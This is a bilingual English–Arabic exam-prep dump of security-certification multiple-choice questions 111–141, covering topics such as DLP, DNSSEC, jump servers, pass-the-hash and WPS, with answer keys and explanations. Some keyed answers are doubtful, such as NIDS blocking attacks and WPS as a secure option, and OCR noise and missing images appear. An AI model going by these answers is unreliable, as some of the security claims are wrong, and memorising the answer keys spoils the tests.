111.A security analyst is investigating a phishing email that contains a malicious document directed to
the company's Chief Executive Officer (CEO).
Which of the following should the analyst perform to understand the threat and retrieve possible IoCs?
A. Run a vulnerability scan against the CEOs computer to find possible vulnerabilities
B. Install a sandbox to run the malicious payload in a safe environment
C. Perform a traceroute to identify the communication path
D. Use netstat to check whether communication has been made with a remote host
Answer: B
Explanation:
To understand the threat and retrieve possible Indicators of Compromise (IoCs) from a phishing
email containing a malicious document, a security analyst should install a sandbox to run the
malicious payload in a safe environment.
‫ويحقق محلل أمني في رسالة إلكترونية للتصيد الاحتيالي تتضمن وثيقة ضارة موجهة إلى كبير الموظفين التنفيذيين‬-111
‫ أي مما يلي يجب على المحلل القيام به لفهم التهديد واسترداد المحتملة؟‬.‫للشركة‬
‫تثبيت وضع الحماية لتشغيل الحمولة الضارة في بيئة آمنة‬
‫) من رسالة بريد إلكتروني للتصيد الاحتيالي تحتوي على مستند‬IoCs( ‫ لفهم التهديد واسترداد مؤشرات التسوية المحتملة‬:‫تفسير‬
.‫ يجب على محلل الأمان تثبيت وضع الحماية لتشغيل الحمولة الضارة في بيئة آمنة‬،‫ضار‬
112.A software company is analyzing a process that detects software vulnerabilities at the earliest stage
possible. The goal is to scan the source looking for unsecure practices and weaknesses before the
application is deployed in a runtime environment.
Which of the following would BEST assist the company with this objective?
A. Use fuzzing testing
B. Use a web vulnerability scanner
C. Use static code analysis
D. Use a penetration-testing OS
Answer: C
Explanation:
Using static code analysis would be the best approach to scan the source code looking for unsecure
practices and weaknesses before the application is deployed in a runtime environment.
‫ الهدف هو فحص‬.‫وتقوم شركة برمجيات بتحليل عملية تكتشف مواطن الضعف في البرمجيات في أبكر مرحلة ممكنة‬-112
‫ أي مما يلي من شأنه أن‬.‫المصدر بحثا عن الممارسات ونقاط الضعف غير الآمنة قبل نشر التطبيق في بيئة وقت التشغيل‬
‫يساعد الشركة بشكل أفضل في تحقيق هذا الهدف؟ استخدام تحليل التعليمات البرمجية الثابتة‬
‫ سيكون استخدام تحليل التعليمات البرمجية الثابتة هو أفضل طريقة لفحص التعليمات البرمجية المصدر بحثا عن‬:‫تفسير‬
.‫الممارسات ونقاط الضعف غير الآمنة قبل نشر التطبيق في بيئة وقت التشغيل‬
57 / 198
The safer , easier way to help you pass any IT exams.
113.A company recently experienced an attack during which 5 main website was directed to the
attacker’s web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company Implement to prevent this type of attack from occurring in the
future?
A. IPSec
B. SSL/TLS
C. DNSSEC
D. S/MIME
Answer: C
Explanation:
DNSSEC (Domain Name System Security Extensions) is a security protocol that adds digital
signaturesto DNS records. This ensures that DNS records are not modified during transit and
prevents DNS hijacking attacks.
‫ مما‬،‫ مواقع رئيسية على شبكة الإنترنت إلى حاسوب خدمة الشبكة الخاص بالمهاجم‬5 ‫وتعرضت إحدى الشركات مؤخرا لهجوم تم خلاله توجيه‬-113
‫ أي مما يلي يجب على الشركة تنفيذه لمنع حدوث هذا النوع من الهجمات في‬.‫سمح للمهاجم بجمع بيانات الاعتماد من العملاء المطمئنين‬
‫المستقبل؟‬
DNS ‫ وهذا يضمن عدم تعديل سجلات‬.DNS ‫ (ملحقات أمان نظام اسم المجال) هو بروتوكول أمان يضيف توقيعات رقمية إلى سجلات‬DNSSEC
.DNS ‫أثناء النقل و يمنع هجمات اختطاف‬
114.A Chief Information Officer is concerned about employees using company-issued laptops lo steal
data when accessing network shares. Which of the following should the company Implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
The company should implement Data Loss Prevention (DLP) to prevent employees from stealing
data when accessing network shares.
‫ويساور أحد كبار موظفي المعلومات القلق إزاء قيام الموظفين الذين يستخدمون حواسيب محمولة تصدرها الشركة بسرقة البيانات عند‬-114
‫ أي مما يلي يجب على الشركة تنفيذه؟‬.‫الوصول إلى مشاركات الشبكة‬
58 / 198
The safer , easier way to help you pass any IT exams.
115.A security engineer needs to build @ solution to satisfy regulatory requirements that stale certain
critical servers must be accessed using MFA However, the critical servers are older and are unable to
support the addition of MFA,.
Which of the following will the engineer MOST likely use to achieve this objective?
A. A forward proxy
B. A stateful firewall
C. A jump server
D. A port tap
Answer: C
Explanation:
A jump server is a secure host that allows users to access other servers within a network. The jump
server acts as an intermediary, and users can access other servers via the jump server after
authenticating with MFA.
‫يحتاج مهندس الأمن إلى بناء حل @ لتلبية المتطلبات التنظيمية التي تنص على أنه يجب الوصول إلى بعض الخوادم‬.115
‫ أي مما يلي‬.MFA ‫ فإن الخوادم الهامة أقدم وغير قادرة على دعم إضافة‬، ‫ ومع ذلك‬MFA ‫الهامة التي لا معنى لها باستخدام‬
‫سيستخدمه المهندس على الأرجح لتحقيق هذا الهدف؟ جمب سيرفر‬
.‫خادم الانتقال السريع هو مضيف آمن يسمح للمستخدمين بالوصول إلى خوادم أخرى داخل الشبكة‬
‫ ويمكن للمستخدمين الوصول إلى خوادم أخرى عبر خادم الانتقال بعد المصادقة باستخدام‬، ‫يعمل خادم الانتقال كوسيط‬
.MFA
116. Which of the following function as preventive, detective, and deterrent controls to reduce the risk of
physical theft? (Select TWO).
A. Mantraps
B. Security guards
C. Video surveillance
D. Fences
E. Bollards
F. Antivirus
Answer: A,B
‫ حراس أمن‬2 _ ‫ مصيدة‬1 .)‫أي من الوظائف التالية كضوابط وقائية وبوليسية ورادعة لتقليل مخاطر السرقة المادية؟ (اختر اثنين‬
117. Which of the following controls would provide the BEST protection against tailgating?
A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage
Answer: A
Explanation:
Access control vestibules, They are effective at preventing tailgating, as only one person can pass
through each door at a time.
‫أي من عناصر التحكم التالية سيوفر أفضل حماية ضد الذيل الخلفي؟ دهليز التحكم في الوصول‬
.‫ حيث يمكن لشخص واحد فقط المرور عبر كل باب في وقت واحد‬، ‫إنها فعالة في منع الذيل‬
59 / 198
The safer , easier way to help you pass any IT exams.
118. HOTSPOT:
You received the output of a recent vulnerability assessment.
Review the assessment and scan output and determine the appropriate remedialion(s} 'or «ach dewce.
Remediation options may be selected multiple times, and some devices may require more than one
remediation.
If at any time you would like to biing bade the initial state ot the simulation, please dick me Reset All
button.
)‫ مراجعة التقييم وإخراج المسح وتحديد العلاج المناسب (العلاجات‬.‫ لقد تلقيت ناتج تقييم الثغرات الأمنية الأخير‬: ‫نقطة ساخنة‬
‫ إذا كنت ترغب‬.‫ وقد تتطلب بعض الأجهزة أكثر من معالجة واحدة‬،‫ قد يتم تحديد خيارات المعالجة عدة مرات‬.dewce ach« ‫أو‬
.‫ فيرجى ديك لي زر إعادة تعيين الكل‬، ‫في أي وقت في الحصول على الحالة الأولية بعد المحاكاة‬
Answer:
60 / 198
The safer , easier way to help you pass any IT exams.
Explanation:
61 / 198
The safer , easier way to help you pass any IT exams.
Graphical user interface, text, application
Description automatically generated
‫واجهة المستخدم الرسومية والنص والتطبيق الوصف الذي يتم إنشاؤه تلقائيا‬
119.A major clothing company recently lost a large amount of proprietary information. The security officer
must find a solution to ensure this never happens again.
Which of the following is the BEST technical implementation to prevent this from happening again?
A. Configure DLP solutions
B. Disable peer-to-peer sharing
C. Enable role-based
D. Mandate job rotation
E. Implement content filters
Answer: A
Explanation:
Data loss prevention (DLP) solutions can prevent the accidental or intentional loss of sensitive data. DLP
tools can identify and protect sensitive data by classifying and categorizing it, encrypting it, or blocking it
from being transferred outside the organization's network.
‫ يجب على ضابط الأمن إيجاد حل لضمان‬.‫فقدت شركة ملابس كبرى مؤخرا قدرا كبيرا من المعلومات المتعلقة بالملكية‬-199
DLP ‫ أي مما يلي هو أفضل تطبيق تقني لمنع حدوث ذلك مرة أخرى؟ تكوين حلول‬.‫عدم حدوث ذلك مرة أخرى‬
DLP ‫ يمكن لأدوات‬.‫) الفقدان العرضي أو المتعمد للبيانات الحساسة‬DLP( ‫شرح \ يمكن أن تمنع حلول منع فقدان البيانات‬
.‫تحديد البيانات الحساسة وحمايتها من خلال تصنيفها وتصنيفها أو تشفيرها أو منعها من نقلها خارج شبكة المؤسسة‬
62 / 198
The safer , easier way to help you pass any IT exams.
120.A security researcher has alerted an organization that its sensitive user data was found for sale on a
website.
Which of the following should the organization use to inform the affected parties?
A. A An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: B
Explanation:
A communicationsplan is a document that outlines how an organization will communicate with
internal and external stakeholders during a crisis or incident.
‫نبه باحث أمني إحدى المنظمات إلى العثور على بيانات مستخدميها الحساسة معروضة للبيع على موقع على شبكة الإنترنت ؟ خطة الاتصالات‬-120
.‫شرح \ خطة الاتصالات هي وثيقة تحدد كيفية تواصل المنظمة مع الداخلية والخارجية أصحاب المصلحة أثناء أزمة أو حادث‬
121. If a current private key is compromised, which of the following would ensure it cannot be used to
decrypt ail historical data?
A. Perfect forward secrecy
B. Elliptic-curve cryptography
C. Key stretching
D. Homomorphic encryption
Answer: A
Explanation:
Perfect forward secrecy would ensure that it cannot be used to decrypt all historical data.
‫ فأي مما يلي سيضمن عدم إمكانية استخدامه لفك تشفير البيانات التاريخية؟ سرية تامة إلى‬، ‫إذا تم اختراق مفتاح خاص حالي‬
.‫ ستضمن السرية التامة إلى الأمام أنه لا يمكن استخدامها لفك تشفير جميع البيانات التاريخية‬.‫الأمام‬
122. Which of the following is a cryptographic concept that operates on a fixed length of bits?
A. Block cipher
B. Hashing
C. Key stretching
D. Salting
Answer: A
Explanation:
Single-key or symmetric-key encryption algorithms create a fixed length of bits known as a block
cipher with a secret key that the creator/sender uses to encipher data (encryption) and the receiver
uses to decipher it.
‫أي مما يلي مفهوم تشفير يعمل على طول ثابت من البتات؟ كتلة التشفير‬
63 / 198
The safer , easier way to help you pass any IT exams.
123.A grocery store is expressing security and reliability concerns regarding the on-site backup
strategy currently being performed by locally attached disks. The main concerns are the physical
securityof the backup media and the durability of the data stored on these devices.
Which of the following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off-site
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution
Answer: D
Explanation:
a backup strategy is a plan that defines how to protect data from loss or corruption by creating and
storing copies of data on a different medium or location1. A backup strategy should consider the security
and reliability of the backup data and the backup storage234.
‫ يعبر متجر بقالة عن مخاوف تتعلق بالأمن والموثوقية فيما يتعلق بالنسخ الاحتياطي في الموقع يتم تنفيذ الإستراتيجية حاليا بواسطة الأقراص‬-123
‫ أي مما يلي هو نهج‬.‫ الاهتمامات الرئيسية هي الأمان المادي لوسائط النسخ الاحتياطي ومتانة البيانات المخزنة على هذه الأجهزة‬.‫المرفقة محليا‬
‫فعال من حيث التكلفة لمعالجة هذه المخاوف؟‬
‫الترحيل إلى حل النسخ الاحتياطي السحابي‬
‫استراتيجية النسخ الاحتياطي هي خطة تحدد كيفية حماية البيانات من الضياع أو التلف عن طريق إنشاء نسخ من البيانات وتخزينها على وسيط أو‬
234‫ يجب أن تأخذ استراتيجية النسخ الاحتياطي في الاعتبار الأمان وموثوقية بيانات النسخ الاحتياطي وتخزين النسخ الاحتياطي‬.1‫موقع مختلف‬
124.Which of the following authentication methods sends out a unique password to be used within a
specific number of seconds?
A. TOTP
B. Biometrics
C. Kerberos
D. LDAP
Answer: A
Explanation:
Time-based One-Time Password (TOTP) is a type of authentication method that sends out a unique
password to be used within a specific number of seconds.
‫أي من طرق المصادقة التالية ترسل كلمة مرور فريدة لاستخدامها في غضون عدد محدد من الثواني؟‬.124
64 / 198
The safer , easier way to help you pass any IT exams.
125.A network analyst is setting up a wireless access point for a home office in a remote, rural location.
The requirement is that users need to connect to the access point securely but do not want to have to
remember passwords.
Which of the following should the network analyst enable to meet the requirement?
A. MAC address filtering
B. 802.1X
C. Captive portal
D. WPS
Answer: D
Explanation:
The network analyst should enable Wi-Fi Protected Setup (WPS) to allow users to connect to the
wireless access point securely without having to remember passwords. WPS allows users to connect to
a wireless network by pressing a button or entering a PIN instead of entering a password.
‫ الشرط هو أن المستخدمين بحاجة إلى الاتصال بنقطة‬.‫يقوم محلل شبكات بإنشاء نقطة وصول لاسلكية لمكتب منزلي في موقع ريفي بعيد‬-125
‫ أي مما يلي يجب أن يقوم محلل الشبكة بتمكينه من تلبية المتطلبات؟‬.‫الوصول بشكل آمن ولكنهم لا يريدون تذكر كلمات المرور‬
‫) للسماح للمستخدمين بالاتصال بنقطة الوصول اللاسلكية بأمان دون الحاجة إلى‬WPS( ‫ المحمي‬Fi-Wi ‫يجب أن يقوم محلل الشبكة بتمكين إعداد‬
‫ للمستخدمين بالاتصال بشبكة لاسلكية عن طريق الضغط على زر أو إدخال رقم تعريف شخصي بدلا من إدخال‬WPS ‫ يسمح‬.‫تذكر كلمات المرور‬
.‫كلمة مرور‬
126.As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a
previous incident is happening again.
Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?
A. Creating a playbook within the SOAR
B. Implementing rules in the NGFW
C. Updating the DLP hash database
D. Publishing a new CRL with revoked certificates
Answer: A
Explanation:
Creating a playbook within the Security Orchestration, Automation and Response (SOAR) tool would
allow the security analyst to detect if an event is reoccurring by triggering automated actions based on
the previous incident's characteristics. This can help the SOC to respond quickly and effectively to the
incident.
‫ أي مما يلي‬.‫ ببناء طرق لاكتشاف ما إذا كان حادث سابق يحدث مرة أخرى‬SOC ‫ تم تكليف‬، ‫كجزء من مرحلة الدروس المستفادة‬
SOAR ‫ في حالة تكرار الحدث؟ إنشاء دليل تشغيل داخل‬SOC ‫سيسمح لمحلل الأمان بتنبيه‬
‫) لمحلل الأمان باكتشاف ما إذا كان‬SOAR( ‫ سيسمح إنشاء دليل تشغيل داخل أداة تنسيق الأمان والأتمتة والاستجابة‬:‫تفسير‬
‫ على الاستجابة‬SOC ‫ يمكن أن يساعد ذلك‬.‫الحدث يتكرر عن طريق تشغيل الإجراءات الآلية بناء على خصائص الحادث السابق‬
.‫بسرعة وفعالية للحادث‬
65 / 198
The safer , easier way to help you pass any IT exams.
127.A third party asked a user to share a public key for secure communication.
Which of the following file formats should the user choose to share the key?
A. .pfx
B. .csr
C. .pvk
D. .cer
Answer: D
Explanation:
A user should choose the .cer file format to share a public key for secure communication.
‫ أي من تنسيقات الملفات التالية يجب أن يختارها المستخدم‬.‫وطلب طرف ثالث من مستعمل أن يتقاسم مفتاحا عموميا للاتصال الآمن‬-127
‫لمشاركة المفتاح؟‬
128.A Chief information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares. Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
Data Loss Prevention (DLP) can help prevent employees from stealing data by monitoring and
controlling access to sensitive data. DLP can also detect and block attempts to transfer sensitive data
outside of the organization, such as via email, file transfer, or cloud storage.
‫ و يساور أحد كبار موظفي المعلومات القلق إزاء استخدام الموظفين لأجهزة الكمبيوتر المحمولة التي تصدرها الشركة لسرقة البيانات‬-128
‫ أي مما يلي يجب على الشركة تنفيذه؟‬.‫عند الوصول إلى أسهم الشبكة‬
129.A security team suspects that the cause of recent power consumption overloads is the unauthorized
use of empty power outlets in the network rack. Which of the following options will mitigate this issue
without compromising the number of outletsavailable?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity
Answer: B
Explanation:
A managed Power Distribution Unit (PDU) allows you to monitor and control power outlets on
the rack.
‫يشتبه فريق أمني في أن سبب الأحمال الزائدة الأخيرة لاستهلاك الطاقة هو الاستخدام غير المصرح به لمنافذ الطاقة الفارغة في حامل‬
‫ أي من الخيارات التالية سيخفف من هذه المشكلة دون المساس بعدد المنافذ المتاحة؟بي دي يو‬.‫الشبكة‬
‫تتيح لك وحدة توزيع الطاقة المدارة مراقبة منافذ الطاقة على الحامل والتحكم فيه‬
66 / 198
The safer , easier way to help you pass any IT exams.
130.A security incident has been resolved. Which of the following BEST describes the importance of the final
phase of the incident response plan?
A. It examines and documents how well the team responded discovers what caused the incident, and
determines how the incident can be avoided in the future
B. It returns the affected systems back into production once systems have been fully patched, data
restored and vulnerabilities addressed
C. It identifies the incident and the scope of the breach how it affects the production environment, and
the ingress point
D. It contains the affected systems and disconnects them from the network, preventing further spread of
the attack or breach
Answer: A
Explanation:
The final phase of an incident response plan is the post-incident activity, which involves examining and
documenting how well the team responded, discovering what caused the incident, and determining how
the incident can be avoided in the future.
‫ أي مما يلي يصف أهمية المرحلة النهائية من خطة الاستجابة للحوادث؟‬.‫ تم حل حادث أمني‬-130
‫ ويحدد كيف يمكن تجنب الحادث في المستقبل‬، ‫يفحص ويوثق مدى استجابة الفريق لاكتشاف سبب الحادث‬
‫ واكتشاف سبب‬، ‫ والذي يتضمن فحص وتوثيق مدى استجابة الفريق‬، ‫ المرحلة الأخيرة من خطة الاستجابة للحادث هي نشاط ما بعد الحادث‬:‫تفسير‬
.‫ وتحديد كيفية تجنب الحادث في المستقبل‬، ‫الحادث‬
131.Which of the following environment utilizes dummy data and is MOST to be installed locally on a
system that allows to be assessed directly and modified easily wit each build?
A. Production
B. Test
C. Staging
D. Development
Answer: D
67 / 198
The safer , easier way to help you pass any IT exams.
132.A security analyst needs to implement an MDM solution for BYOD users that will allow the company
to retain control over company emails residing on the devices and limit data exfiltration that might occur if
the devices are lost or stolen. Which of the following would BEST meet these requirements? (Select
TWO).
A. Full-device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application whitelisting
F. Remote control
Answer: A,B
‫ والذي سيسمح للشركة بالاحتفاظ بالتحكم في رسائل البريد‬BYOD ‫ لمستخدمي‬MDM ‫يحتاج محلل الأمان إلى تنفيذ حل‬
‫ أي مما‬.‫الإلكتروني للشركة الموجودة على الأجهزة والحد من استخراج البيانات الذي قد يحدث في حالة فقد الأجهزة أو سرقتها‬
‫ قواعد استخدام الشبكة‬, ‫يلي يلبي هذه المتطلبات بشكل أفضل؟ تشفير الجهاز بالكامل‬
133. Ann, a customer, received a notification from her mortgage company stating her PII may be shared
with partners, affiliates, and associates to maintain day-to-day business operations.
Which of the following documents did Ann receive?
A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding
Answer: A
Explanation:
Ann received an annual privacy notice from her mortgage company. An annual privacy notice is a
statement from a financial institution or creditor that outlines the institution's privacy policy and explains
how the institution collects, uses, and shares customers' personal information. It informs the customer
about their rights under the Gramm-Leach-Bliley Act (GLBA) and the institution's practices for protecting
their personal information.
‫ إشعارا من شركة الرهن العقاري الخاصة بها تفيد بأنه يمكن مشاركة معلومات تحديد الهوية الشخصية الخاصة بها مع‬، ‫ وهي عميلة‬، ‫تلقت آن‬
‫ أي من المستندات الآتية تلقتها آن؟‬.‫الشركاء والشركات التابعة والزملاء للحفاظ على العمليات التجارية اليومية‬
‫إشعار الخصوصية السنوي‬
‫ إشعار الخصوصية السنوي هو بيان من مؤسسة مالية أو دائن‬.‫ تلقت آن إشعارا سنويا بالخصوصية من شركة الرهن العقاري الخاصة بها‬:‫تفسير‬
‫ يقوم بإعلام العميل‬.‫يحدد سياسة خصوصية المؤسسة ويشرح كيفية قيام المؤسسة بجمع المعلومات الشخصية للعملاء واستخدامها ومشاركتها‬
.‫) وممارسات المؤسسة لحماية معلوماته الشخصية‬GLBA( Bliley-Leach-Gramm ‫بحقوقه بموجب قانون‬
68 / 198
The safer , easier way to help you pass any IT exams.
134. Which of the following uses six initial steps that provide basic control over system security by
including hardware and software inventory, vulnerability management, and continuous monitoring to
minimize risk in all network environments?
A. ISO 27701
B. The Center for Internet Security
C. SSAE SOC 2
D. NIST Risk Management Framework
Answer: B
Explanation:
The Center for Internet Security (CIS) uses six initial steps that provide basic control over system
security, including hardware and software inventory, vulnerability management, and continuous
monitoring to minimize risk in all network environments.
‫أي مما يلي يستخدم ست خطوات أولية توفر تحكما أساسيا في أمان النظام من خلال تضمين مخزون الأجهزة والبرامج وإدارة‬
‫الثغرات الأمنية والمراقبة المستمرة لتقليل المخاطر في جميع بيئات الشبكة؟ مركز أمن الإنترنت‬
‫ بما في ذلك مخزون الأجهزة‬، ‫) ست خطوات أولية توفر تحكما أساسيا في أمان النظام‬CIS( ‫ يستخدم مركز أمن الإنترنت‬:‫تفسير‬
.‫والبرامج وإدارة الثغرات الأمنية والمراقبة المستمرة لتقليل المخاطر في جميع بيئات الشبكة‬
135.A cybersecurity administrator needs to implement a Layer 7 security control on a network and block
potential attacks. Which of the following can block an attack at Layer 7? (Select TWO).
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
G. Stateless firewall
Answer: D,F
Explanation:
A WAF (Web Application Firewall) and NIDS (Network Intrusion Detection System) are both examples of
Layer 7 security controls. A WAF can block attacks at the application layer (Layer 7) of the OSI model by
filtering traffic to and from a web server. NIDS can also detect attacks at Layer 7 by monitoring network
traffic for suspicious patterns and behaviors.
‫ أي مما يلي‬.‫ على الشبكة ومنع الهجمات المحتملة‬7 ‫يحتاج مدير الأمن السيبراني إلى تنفيذ عنصر تحكم أمني من الطبقة‬-135
.)‫؟ (اختر اثنين‬7 ‫يمكنه منع هجوم في الطبقة‬
‫ (نظام كشف التسلل إلى الشبكة) مثالين على عناصر التحكم في‬NIDS ‫ (جدار حماية تطبيق الويب) و‬WAF ‫ يعد كل من‬:‫تفسير‬
‫ عن طريق تصفية حركة المرور من‬OSI ‫) لنموذج‬7 ‫ حظر الهجمات في طبقة التطبيق (الطبقة‬WAF ‫ يمكن ل‬.7 ‫أمان الطبقة‬
‫ من خلال مراقبة حركة مرور الشبكة بحثا عن الأنماط‬7 ‫ أيضا اكتشاف الهجمات في الطبقة‬NIDS ‫ يمكن ل‬.‫وإلى خادم الويب‬
.‫والسلوكيات المشبوهة‬
69 / 198
The safer , easier way to help you pass any IT exams.
136.An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days.
A security analyst notices the following:
• Financial transactions were occurring during irregular time frames and outside of business hours by
unauthorized users.
• Internal users in question were changing their passwords frequently during that time period.
• A jump box that several domain administrator users use to connect to remote devices was recently
compromised.
• The authentication method used in the environment is NTLM.
Which of the following types of attacks is MOST likely being used to gain unauthorized access?
A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay
Answer: A
Explanation:
The suspicious activity reported by the application owner, combined with the recent compromise of the
jump box and the use of NTLM authentication, suggests that an attacker is likely using a pass-the-hash
attack to gain unauthorized access to the financial application. This type of attack involves stealing
hashed passwords from memory and then using them to authenticate as the compromised user without
needing to know the user's plaintext password.
‫ يوما‬14 ‫ وأبلغ مالك التطبيق عن نشاط مشبوه في تطبيق مالي داخلي من مختلف المستعملين الداخليين خلال ال‬-136
‫ كانت المعاملات المالية تحدث خلال أطر زمنية غير منتظمة وخارج ساعات العمل‬:‫ يلاحظ محلل الأمن ما يلي‬.‫الماضية‬
‫ كان المستخدمون الداخليون المعنيون يغيرون كلمات المرور الخاصة بهم بشكل‬.‫من قبل مستخدمين غير مأذون لهم‬
‫ تم مؤخرا اختراق مربع الانتقال السريع الذي يستخدمه العديد من مستخدمي مسؤول‬.‫متكرر خلال تلك الفترة الزمنية‬
‫ أي من أنواع الهجمات التالية يتم‬.NTLM ‫ طريقة المصادقة المستخدمة في البيئة هي‬.‫المجال للاتصال بالأجهزة البعيدة‬
‫استخدامه على الأرجح للوصول غير المصرح به؟ تمرير التجزئة‬
‫ جنبا إلى جنب مع الاختراق الأخير لمربع الانتقال واستخدام‬، ‫ يشير النشاط المشبوه الذي أبلغ عنه مالك التطبيق‬:‫تفسير‬
‫ إلى أن المهاجم من المحتمل أن يستخدم هجوم تمرير التجزئة للحصول على وصول غير مصرح به إلى‬، NTLM ‫مصادقة‬
‫ يتضمن هذا النوع من الهجوم سرقة كلمات المرور المجزأة من الذاكرة ثم استخدامها للمصادقة‬.‫التطبيق المالي‬
.‫كمستخدم مخترق دون الحاجة إلى معرفة كلمة مرور النص العادي للمستخدم‬
70 / 198
The safer , easier way to help you pass any IT exams.
137.A security architect is implementing a new email architecture for a company. Due to security
concerns, the Chief Information Security Officer would like the new architecture to support email
encryption, as well as provide for digital signatures. Which of the following should the architect
implement?
A. TOP
B. IMAP
C. HTTPS
D. S/MIME
Answer: D
Explanation:
S/MIME (Secure/Multipurpose Internet Mail Extensions) is a protocol that enables secure email
messages to be sent and received. It provides email encryption, as well as digital signatures, which can
be used to verify the authenticity of the sender. S/MIME can be used with a variety of email protocols,
including POP and IMAP.
‫ يود كبير موظفي أمن المعلومات أن يدعم‬،‫ ونظرا للشواغل الأمنية‬.‫ يقوم مهندس أمني بتنفيذ بنية بريد إلكتروني جديدة لشركة‬-137
‫ أي مما يلي يجب على المهندس المعماري تنفيذه؟ اس ميمي‬.‫ فضلا عن توفير التوقيعات الرقمية‬،‫الهيكل الجديد تشفير البريد الإلكتروني‬
‫ يوفر تشفير‬.‫متعددة الأغراض) هو بروتوكول يتيح إرسال رسائل البريد الإلكتروني الآمنة واستلامها‬/‫ (ملحقات بريد إنترنت الآمنة‬MIME/S :‫تفسير‬
‫ مع مجموعة‬MIME/S ‫ يمكن استخدام‬.‫ والتي يمكن استخدامها للتحقق من صحة المرسل‬، ‫ بالإضافة إلى التوقيعات الرقمية‬، ‫البريد الإلكتروني‬
.IMAP‫ و‬POP ‫ بما في ذلك‬،‫متنوعة من بروتوكولات البريد الإلكتروني‬
138. Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code
in a software company’s final software releases? (Select TWO.)
A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software
Answer: D,E
Explanation:
The most likely vectors for the unauthorized inclusion of vulnerable code in a software company's final
software releases are included third-party libraries and vendors/supply chain.
‫أي مما يلي هو المتجهات الأكثر احتمالا للتضمين غير المصرح به للتعليمات البرمجية الضعيفة في إصدارات البرامج النهائية لشركة البرمجيات؟‬
‫ سلسلة التوريد‬/ ‫) مكتبات الجهات الخارجية المضمنة _ البائعون‬.‫(حدد اثنين‬
‫ يتم تضمين المتجهات الأكثر احتمالا للتضمين غير المصرح به للتعليمات البرمجية الضعيفة في إصدارات البرامج النهائية لشركة البرمجيات‬:‫تفسير‬
.‫ سلسلة التوريد‬/ ‫مكتبات الجهات الخارجية والبائعين‬
71 / 198
The safer , easier way to help you pass any IT exams.
139. The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy
requiring all unsanctioned high-risk SaaS applications to be blocked from user access.
Which of the following is the BEST security solution to reduce this risk?
A. CASB
B. VPN concentrator
C. MFA
D. VPC endpoint
Answer: A
Explanation:
A Cloud Access Security Broker (CASB) can be used to monitor and control access to cloud-based
applications, including unsanctioned SaaS applications. It can help enforce policies that prevent access
to high-risk SaaS applications and provide visibility into the use of such applications by employees.
‫ عالية‬SaaS ‫وجه كبير مسؤولي أمن المعلومات الحد من المخاطر في تكنولوجيا المعلومات الظل ووضع سياسة تتطلب حظر جميع تطبيقات‬
‫ أي مما يلي هو أفضل حل أمني لتقليل هذا الخطر؟‬.‫المخاطر غير المصرح بها من وصول المستخدم‬
‫ بما في‬، ‫) لمراقبة الوصول إلى التطبيقات المستندة إلى السحابة والتحكم فيه‬CASB( ‫ يمكن استخدام وسيط أمان الوصول إلى السحابة‬:‫تفسير‬
‫ عالية الخطورة وتوفير رؤية‬SaaS ‫ يمكن أن يساعد في فرض السياسات التي تمنع الوصول إلى تطبيقات‬.‫ غير المصرح بها‬SaaS ‫ذلك تطبيقات‬
.‫لاستخدام هذه التطبيقات من قبل الموظفين‬
140.A new security engineer has started hardening systems. One of the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to
use SCP to transfer files to the NAS, even through the data is still viewable from the user’s PCs.
Which of the following is the most likely cause of this issue?
A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.config instead of using the sshd.conf
D. Network services are no longer running on the NAS
Answer: B
Explanation:
SSH stands for Secure Shell Protocol, which is a cryptographic network protocol that allows secure
remote login and command execution on a network device12. SSH can encrypt both the authentication
information and the data being exchanged between the client and the server2. SSH can be used to
access and manage a NAS device remotely3.
‫ تتضمن إحدى تقنيات التصلب التي يستخدمها المهندس تعطيل عمليات تسجيل الدخول عن بعد‬.‫ وبدأ مهندس أمن جديد في تقوية الأنظمة‬-140
‫ حتى من خلال البيانات التي لا تزال قابلة‬، NAS ‫ لنقل الملفات إلى‬SCP ‫ يقوم المستخدمون الآن بالإبلاغ عن عدم القدرة على استخدام‬.NAS ‫إلى‬
‫ بدلا من تعديل ملف‬SSH ‫ أي مما يلي هو السبب الأكثر احتمالا لهذه المشكلة؟ تم إيقاف تشغيل‬.‫للعرض من أجهزة الكمبيوتر الخاصة بالمستخدم‬
‫التكوين‬
‫ وهو بروتوكول شبكة تشفير يسمح بتسجيل الدخول الآمن عن بعد وتنفيذ الأوامر على جهاز شبكة‬، Shell Secure ‫ إلى بروتوكول‬SSH ‫ يرمز‬:‫تفسير‬
NAS ‫ للوصول إلى جهاز‬SSH ‫ يمكن استخدام‬.2‫ تشفير كل من معلومات المصادقة والبيانات التي يتم تبادلها بين العميل والخادم‬SSH ‫ يمكن ل‬.12
.3‫وإدارته عن بعد‬
72 / 198
The safer , easier way to help you pass any IT exams.
141.A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
Which of the following types of attacks is being attempted and how can it be mitigated?
A. XSS. implement a SIEM
B. CSRF. implement an IPS
C. Directory traversal implement a WAF
D. SQL infection, implement an IDS
Answer: C
Explanation:
The attack being attempted is directory traversal, which is a web application attack that allows an
attacker to access files and directories outside of the web root directory. A WAF can help mitigate this
attack by detecting and blocking attempts to access files outside of the web root directory.
